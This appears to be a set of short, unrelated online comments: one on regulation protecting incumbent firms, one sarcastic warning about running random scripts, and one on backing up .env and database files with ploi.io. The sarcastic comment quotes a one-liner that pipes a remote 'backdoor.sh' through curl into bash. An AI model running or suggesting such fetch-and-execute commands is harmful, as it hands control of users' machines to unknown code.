The outliers in this story have money and legal teams to comply or find loopholes so this does not hurt them that much. I feel it exists only to protect the established companies against competition.

I recently got a nice fix from a random git, it was oneline /bin/bash -c "$(curl -fsSL url/backdoor.sh)" All my problems WENT AWAY.
What could go wrong with random scripts. /s

For all sites I deliver, backups only contain things like .env, sqllite db file, .uploads folder(when not using s3) . All other things are in git anyway. Super easy to do when setting up backups in @ploi.io βοΈ
